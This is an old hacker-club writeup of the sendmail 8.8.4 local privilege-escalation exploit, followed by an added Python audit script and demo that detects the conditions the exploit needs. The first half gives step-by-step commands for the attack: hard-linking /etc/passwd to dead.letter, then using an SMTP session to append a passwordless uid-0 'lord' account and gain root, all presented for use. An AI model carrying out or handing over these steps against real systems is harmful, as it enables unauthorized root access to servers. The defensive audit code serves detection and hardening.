sendmail 8.8.4 exploit

"sendmail? 'tis the buggiest program" -phriend-

Ok, here's a brief and interesting explanation of this famous exploit. This exploit uses sendmail version 8.8.4 and it requires that you have a shell account on the server in question. The exploit creates a hard link from /etc/passwd to /var/tmp/dead.letter, so when sendmail saves an undeliverable message to dead.letter it is really appending to /etc/passwd. Very simple really.

Here's how it works. Below are the exact commands as you have to type them (for the technically challenged ones):

 * ln /etc/passwd /var/tmp/dead.letter
 * telnet target.host 25
 * mail from: nonexistent@not.an.actual.host.com
 * rcpt to: nonexistent@not.an.actual.host.com
 * data
 * lord::0:0:leet shit:/root:/bin/bash
 * .
 * quit

Kaboom, you're done. Telnet to port 23 and log in as lord, no password required. Thanks to a little bit of work we did, lord just happens to have the same privileges as root.

There are a couple of reasons why this might not work.

1. /var and / are different partitions (as you already know, you can't make hard links between different partitions).
2. There is a postmaster account or mail alias on the machine, in which case your mail will end up there instead of being written to /etc/passwd.
3. /var/tmp doesn't exist or isn't publicly writable.

Duncan Silver
www.hackersclub.com/uu
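The three failure conditions above double as the defender's checklist for this whole class of hard-link-into-a-spool bugs. The following Python audit is an added example, not part of the original writeup: it reports extra hard links to a passwd file (a link count above 1 means another name, such as dead.letter, shares the inode), a world-writable temp directory that sits on the same filesystem as passwd (condition 1), and, on Linux, whether the fs.protected_hardlinks sysctl is off (it forbids hard-linking files the caller does not own, which defeats the ln step outright). The passwd and tmp paths are parameters; demo() builds a throwaway directory with a constructed passwd file so it runs without touching the real system.

```python
import os
import stat
import tempfile

# Linux sysctl: "1" means users may only hard-link files they own (or have
# read/write access to). Absent on non-Linux systems.
PROTECTED_HARDLINKS = "/proc/sys/fs/protected_hardlinks"


def extra_hard_links(path):
    """Hard links to `path` beyond its one expected directory entry.

    A regular file normally has st_nlink == 1; any more means another name
    (e.g. /var/tmp/dead.letter) points at the same inode.
    """
    return os.stat(path).st_nlink - 1


def same_filesystem(a, b):
    """True if both paths are on one filesystem (same st_dev), which is the
    only case in which a hard link between them can be created."""
    return os.stat(a).st_dev == os.stat(b).st_dev


def world_writable(path):
    """True if 'other' has write permission on `path`."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def hardlinks_protected():
    """True if fs.protected_hardlinks is enabled, False if disabled,
    None if the sysctl is not available on this system."""
    try:
        with open(PROTECTED_HARDLINKS) as fh:
            return fh.read().strip() == "1"
    except OSError:
        return None


def audit(passwd_path, tmp_path):
    """Return a list of human-readable findings; an empty list is clean."""
    findings = []
    if extra_hard_links(passwd_path) > 0:
        findings.append("extra hard link(s) to %s" % passwd_path)
    if os.path.isdir(tmp_path) and world_writable(tmp_path) \
            and same_filesystem(passwd_path, tmp_path):
        findings.append("%s is world-writable and on the same filesystem as %s"
                        % (tmp_path, passwd_path))
    if hardlinks_protected() is False:
        findings.append("fs.protected_hardlinks is 0 (hard links to "
                        "unowned files allowed)")
    return findings


def demo():
    """Run the audit on a constructed layout: a fake passwd file and a
    world-writable, sticky tmp dir, before and after a dead.letter link."""
    with tempfile.TemporaryDirectory() as root:
        passwd = os.path.join(root, "passwd")   # stands in for /etc/passwd
        tmpdir = os.path.join(root, "tmp")      # stands in for /var/tmp
        os.mkdir(tmpdir)
        os.chmod(tmpdir, 0o1777)
        with open(passwd, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample
        before = audit(passwd, tmpdir)
        # The one extra name that the writeup relies on.
        os.link(passwd, os.path.join(tmpdir, "dead.letter"))
        after = audit(passwd, tmpdir)
        return before, after


if __name__ == "__main__":
    for label, findings in zip(("before link", "after link"), demo()):
        print(label + ":", findings or ["clean"])
```

Point audit() at the real /etc/passwd and /var/tmp from a cron job and alert on any "extra hard link" finding; the same-filesystem finding is the structural fix the writeup's reason 1 describes (keep /var on its own partition), and protected_hardlinks=1 closes the ln step on modern Linux regardless of layout.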